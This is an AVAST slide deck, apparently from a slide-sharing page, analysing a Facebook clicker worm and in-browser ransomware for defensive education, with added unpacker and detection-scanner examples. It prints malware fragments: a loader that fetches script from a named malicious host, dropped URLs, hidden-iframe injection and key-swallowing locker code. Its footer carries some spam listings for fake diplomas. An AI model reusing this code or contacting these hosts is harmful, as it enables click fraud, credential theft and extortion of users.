Where There's Money, There's Crime: Web-based Threats
Security threats on the web
Jan Širmer
Pavel Šrámek
Cybercrime landscape
Cyber-security myths
Which of these myths have you heard?
• I can safely open this attachment because
the e-mail came from my friend
• I can protect myself from malware
by not going on porn/warez sites
• Malware is only a problem on Windows
• Malware is created by teenage geeks
simply for bragging rights
• Malware is created by antivirus vendors
26. 8. 2017 AVAST Viruslab
The crimeware business
Malware authors are in it for the money
• LockScreens, FakeAVs and encrypting ransomware
• Banking trojans
• Phishing, Identity theft
• Botnets offered as a service
– Spam
– DDoS
– CPU power (bitcoin mining, hash cracking, …)
All sold on the black market
Traditional infection vectors
The easiest way to infect a machine?
Convince the user to run it himself!
• social engineering
Your second best bet?
• zero-day vulnerabilities – Java, Adobe Reader, Flash
• out-of-date and/or pirated OS installations
• hacked websites = best free hosting
→ Commercial exploit kits
Traditional infection timeline (diagram): the victim requests website content from a compromised server; the server returns malicious JS that runs a vulnerability check and fetches exploit code; the exploit installs the payload; the installed malware then communicates with its C&C server as a bot running as a background service.
The new option: in-browser malware
Traditional attacks target a single OS platform
(mostly Win32).
How to attack all platforms at once?
• Use the common denominator – HTML + JS, the web browser
• Rich JS APIs and fast engines
• JS-based extensions = additional attack surface
• Attacks come from the web anyway
The new option: in-browser malware
In-browser JS can do:
• Click hijacking for Ad-click fraud
• Worm-like spreading over social networks
• Ransomware equivalent (browser lockup)
• DDoS via AJAX
• Even cryptocurrency mining
Facebook Clickjacking
Click for me
Click here! Click here!
Option A: Native executable clicker
Option B: Fake Flash player
Payloads
• Win32 extension: BHO (Internet Explorer)
• JavaScript-based extensions: CRX (Chrome), XPI (Firefox)
Payload in IE
• Originally base64 obfuscated
• Injecting BHO
Firefox plug-in Installation
Payloads for FF and Chrome
eval(function(p,a,c,k,e,d){
  e=function(c){return c};
  if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
  while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}
  return p
}('3639={3:12,10:12,59:9**REMOVED**;',10,110,'||this|prefs**REMOVED**|GET'.split('|'),0,{}));
Dean unpacked
this.prefService.savePrefFile(null);
this.req("uri", "`||x2''zqfo8&em'b&x`x7}5", guid, 8);}},
http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM
{this.req("buri", "lppt>++igq}em*gki+n*tlt;q9", g, inx);}
http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM
{ xuri = this.dec(this.uri(m, uri), inx) + "" + g + "&b=1&v=k00001&r=" + Math.floor(Math.random() * 999999); }
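The "Dean unpacked" step above can be reproduced without ever executing the payload. The following is an added example (not code from the slides or from AVAST Viruslab) that parses the four arguments of a Dean Edwards p,a,c,k call and replays its substitution loop statically; the packed sample it runs on is constructed here and the `unpackPacker`/`encodeIndex` names are our own.

```javascript
// Added example: static unpacker for the Dean Edwards "p,a,c,k,e,d" packer.
// It never calls eval(); it extracts p (packed source), a (radix), c (word
// count) and k (the '|'-separated dictionary) and redoes the replacements.

// Matches the tail of the packer call: ...}('<p>',<a>,<c>,'<k>'.split('|')
const PACKER_RE = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)/;

// Undo the single-quoted JS string escapes the packer emits for p and k.
function unescapeJsString(s) {
  return s.replace(/\\(.)/g, (m, ch) => {
    switch (ch) {
      case 'n': return '\n';
      case 'r': return '\r';
      case 't': return '\t';
      default: return ch; // \\ and \' map to the character itself
    }
  });
}

// Encode a dictionary index exactly as the packer does for radix a:
// radix 10 gives plain digits, 36 gives 0-9a-z, 62 adds A-Z.
function encodeIndex(c, a) {
  const head = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const rem = c % a;
  return head + (rem > 35 ? String.fromCharCode(rem + 29) : rem.toString(36));
}

function isPacked(src) {
  return /eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)/.test(src);
}

// Returns the unpacked source, or null when src is not a (well-formed) packer call.
function unpackPacker(src) {
  if (!isPacked(src)) return null;
  const m = PACKER_RE.exec(src);
  if (!m) return null;
  let p = unescapeJsString(m[1]);
  const a = parseInt(m[2], 10);
  const c = parseInt(m[3], 10);
  const k = unescapeJsString(m[4]).split('|');
  if (k.length !== c) return null; // dictionary size must match the word count
  // Same loop as the packer's own decoder: highest index first, so that
  // the token "10" is restored before "1" and "0" are touched.
  for (let i = c - 1; i >= 0; i--) {
    if (!k[i]) continue; // empty entry: the word already equals its encoding
    p = p.replace(new RegExp('\\b' + encodeIndex(i, a) + '\\b', 'g'), k[i]);
  }
  return p;
}

// Constructed sample in the shape of the slide's packed payload (radix 10).
const PACKED_SAMPLE = [
  "eval(function(p,a,c,k,e,d){e=function(c){return c};",
  "if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}",
  "k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};",
  "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}",
  "return p}('4.0(\"1\",2,3,5);4.0(\"6\",7,3,5)',10,8,",
  "'req|uri|x|guid|this|8|buri|y'.split('|'),0,{}))",
].join('');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(unpackPacker(PACKED_SAMPLE));
}
```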
Changes in browser settings
TestAddon.buri   user set   string   lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch     default    string
TestAddon.date   user set   string   1340624313
TestAddon.guid   user set   string   3c94f90903f031a799162872a55742e8
TestAddon.int    user set   string   60
TestAddon.uri    user set   string   ‘||x2””eakzg9:&i|”b&x’x7}5
Dropped URLs
• http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM
• http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM
The script trail
document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/js_f.php?v=0.05a
• Two variants of the payload returned by js_f.php
1. Self-spreading clicker
2. Clicker only
• Additional functionality
– Page auto-like
– Get online friends
– Solve CAPTCHA
– Stealing FB credentials
Self-spreading malware
• The script updates the victim's Facebook and Twitter feeds by posting new status messages
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {
  var randomnumber = Math.floor(Math.random() * 100);
  if (randomnumber > 0) {
    ...
Injected iframe creation
function createIframe(src) {
  var ifr = document.createElement("iframe");
  ifr.setAttribute("src", src);
  ifr.style.position = "absolute";
  ifr.style.top = "0";
  ifr.style.left = "0";
  ifr.style.width = "100%";
  ifr.style.height = "100%";
  document.body.appendChild(ifr)
}
function get_img_src(src, no) {
  x = src.getElementsByTagName("img");
  return x[no].id
}
function make_dom(src) {
  var tempDiv = document.createElement("div");
  tempDiv.innerHTML = src;
  return tempDiv
}
Clicker
• BHO, Firefox and Chrome payloads all contain a link to a site like http://resultsz.com/search/anticheat6.php?username=foreste
• The site hosts a list of other sites used by all of those "clickers" for injecting hidden iframes into every visited site and earning money for the blackhats.
FB Clicker: mini-summary
FB Clicker: Attack vector
Exploit: ID-10-T
• Method: Social engineering (celebrities, user curiosity)
• Target: Largest social network
Technique: Impersonation
• Common masquerade – Adobe Flash Player
• Trained response to plugin installation prompts
→ A significant portion of users will not identify the scam
FB Clicker: Technology
Approach: Extension-based
• Provides extensions for 3 major browsers
• Functionality is the same
Technology: Web-based where possible
• IE uses native extensions (BHO = Win32 DLL)
• FF and Chrome use JS-driven extensions
• JavaScript code is shared
→ FF and Chrome attacks are OS-independent worms
In-Browser Ransomware
Geo-specific content
Self-protection attempt
function prepare_Frame(c) {
  ifrm = document.createElement("IFRAME");
  ifrm.setAttribute("src", "LEND/EN/alert.html");
  ifrm.setAttribute("class", "frame");
  ifrm.name = "iname" + c;
  ifrm.src = "LEND/EN/alert.html";
  ifrm.style.display = "none";
  ifrm.style.width = 0 + "px";
  ifrm.style.height = 0 + "px";
  return ifrm;
  //document.body.appendChild(ifrm);
}
function catchControlKeys(event)
{
  var code = event.keyCode ? event.keyCode : event.which ? event.which : null;
  if (event.ctrlKey)
  {
    if (code == 117) return false; // Ctrl + u
    if (code == 85) return false;  // Ctrl + U
    if (code == 99) return false;  // Ctrl + c
    if (code == 67) return false;  // Ctrl + C
    if (code == 97) return false;  // Ctrl + a
    if (code == 65) return false;  // Ctrl + A
  }
}
Close Prevention
What's happening in the background?
Repeated attempts to close
Malicious site examples
Spread
In-browser ransomware: mini-summary
In-browser ransomware: Attack vector
Exploit: ID-10-T again
• Method: poisoned links
• Target: people looking for illegal content
Technique: Scares, threats, lies
• Proven direct monetization scheme
• Some panicked / guilty users really pay
→ Ransomware like any other, just faster-acting
In-browser ransomware: Technology
Approach: Pure webpage (HTML + JS)
• Server-side static pages + payment form
• Later versions: Geo-targeted content
Technology: JS only (client-side)
• Event swallowing = lock-like functionality
• Rudimentary self-protection
• Easily evaded by power users (who won't pay anyway)
→ Direct monetization in any modern browser!
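Both families in this deck leave recognisable traces in page script: the clicker's remote script loader and packed eval (slides 17 and 20) and the ransomware page's hidden iframe, Ctrl-key swallowing and close prevention (slides 32 and 33). The following is an added example (not code from the slides or from AVAST Viruslab) of a defender-side static scan over captured scripts; the rule names, weights and the three sample scripts are constructed, and the host in the clicker sample is a placeholder.

```javascript
// Added example: static indicator scan for the in-browser clicker and
// browser-locker patterns shown in the deck. Rules are regex heuristics over
// script text; they do not execute anything.

const INDICATORS = [
  { // Dean Edwards p,a,c,k wrapper around the FF/Chrome payload (slide 17)
    name: 'packed-eval', weight: 2,
    re: /eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)/,
  },
  { // injected <script> whose src is fetched from a remote host (slide 20)
    name: 'remote-script-load', weight: 1,
    re: /createElement\s*\(\s*['"]script['"]\s*\)[\s\S]{0,200}?\.src\s*=\s*['"]https?:\/\//,
  },
  { // iframe created hidden or zero-sized, as the clicker and locker do (slides 24, 32)
    name: 'hidden-iframe', weight: 2,
    re: /createElement\s*\(\s*['"]iframe['"]\s*\)[\s\S]{0,400}?(display\s*=\s*['"]none['"]|(width|height)\s*=\s*(['"]?0(px)?['"]?|0\s*\+\s*['"]px['"]))/i,
  },
  { // Ctrl+U/C/A swallowed by returning false from a key handler (slide 32)
    name: 'ctrl-key-swallowing', weight: 2,
    re: /ctrlKey[\s\S]{0,300}?return\s+false/,
  },
  { // beforeunload handler, the usual basis of "close prevention" (slide 33)
    name: 'unload-blocking', weight: 1,
    re: /(onbeforeunload|addEventListener\s*\(\s*['"]beforeunload['"])/,
  },
];

// Returns the matched rule names (in rule order) and their summed weight;
// the caller picks a threshold, e.g. score >= 3 sends the script to review.
function scanScript(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source));
  return {
    indicators: hits.map((h) => h.name),
    score: hits.reduce((sum, h) => sum + h.weight, 0),
  };
}

// Pull every absolute http(s) URL out of the script for blocklist lookup.
function extractRemoteUrls(source) {
  return Array.from(new Set(source.match(/https?:\/\/[^\s'"<>]+/g) || []));
}

// Constructed sample 1: browser-locker page script (shape of the slide 32/33 code).
const LOCKER_SAMPLE = `
function prepare_Frame(c) {
  ifrm = document.createElement("IFRAME");
  ifrm.setAttribute("src", "LEND/EN/alert.html");
  ifrm.style.display = "none";
  ifrm.style.width = 0+"px";
  return ifrm;
}
function catchControlKeys(event) {
  var code = event.keyCode ? event.keyCode : event.which;
  if (event.ctrlKey) { if (code == 85) return false; }
}
window.onbeforeunload = function () { return "Pay the fine first"; };
`;

// Constructed sample 2: clicker loader (shape of the slide 17/20 code; placeholder host).
const CLICKER_SAMPLE = `
var s = document.createElement('script'); s.type = 'text/javascript';
s.src = 'http://js-host.example/js_f.php?v=0.05a';
document.getElementsByTagName('head')[0].appendChild(s);
eval(function(p,a,c,k,e,d){e=function(c){return c};return p}('0(1)',10,2,'a|b'.split('|'),0,{}));
`;

// Constructed sample 3: ordinary page code using the same APIs legitimately.
const BENIGN_SAMPLE = `
document.addEventListener('keydown', function (e) {
  if (e.ctrlKey && e.key === 's') { e.preventDefault(); saveDraft(); }
});
var f = document.createElement('iframe'); f.src = '/embed/video'; f.style.width = '100%';
`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, src] of [['locker', LOCKER_SAMPLE], ['clicker', CLICKER_SAMPLE], ['benign', BENIGN_SAMPLE]]) {
    console.log(label, scanScript(src), extractRemoteUrls(src));
  }
}
```

The heuristic keys on `return false` after `ctrlKey`, so a legitimate handler that calls `preventDefault()` for one shortcut (sample 3) scores zero while the locker's blanket swallowing does not.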
Conclusion
Reiteration
Cybersecurity scene
• Financially motivated criminals
• Low awareness of inner workings
Facebook clicker
• Worm-like spreading behavior in JS
• Malicious extensions
In-browser ransomware
• Existing formula, new implementation
• Truly cross-platform
Final thoughts:
Know your foe
• Bad guys will take advantage of anything
• Everyone with a browser is a potential target
• The average Joe's devices have value once compromised
Web tech can be abused
• Cross-platform code allows cross-platform malware
• JavaScript can do a lot
• No traditional exploitation needed, so fewer security measures stand in the way
→ Learn which kinds of attacks are possible, educate others
EOF
Join the discussion with AVAST developers
Follow us on Twitter and G+
@avast_devs
#AVASTdevs

More Related Content

What's hot

WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
lpilorz
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
Xavier Mertens
 
Web application Security
Web application SecurityWeb application Security
Web application Security
Lee C
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 

What's hot (6)

WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 

Similar to Where There's Money, There's Crime: Web-based Threats

Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
Omer Meshar
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
Stefano Di Paola
 
HackAvert
HackAvertHackAvert
HackAvert
fepinette
 
Hack miami emiliocasbas
Hack miami emiliocasbasHack miami emiliocasbas
Hack miami emiliocasbasEmilio Casbas
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Tinashe Makuti
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
Simon Willison
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 

Similar to Where There's Money, There's Crime: Web-based Threats (20)

Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
HackAvert
HackAvertHackAvert
HackAvert
 
Hack miami emiliocasbas
Hack miami emiliocasbasHack miami emiliocasbas
Hack miami emiliocasbas
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 

More from Avast

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
Avast
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
Avast
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
Avast
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
Avast
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
Avast
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
Avast
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
Avast
 

More from Avast (7)

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
 

Recently uploaded

1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
JungkooksNonexistent
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
laozhuseo02
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
GTProductions1
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
test test test test testtest test testtest test testtest test testtest test ...
test test  test test testtest test testtest test testtest test testtest test ...test test  test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
nirahealhty
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 

Recently uploaded (20)

1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
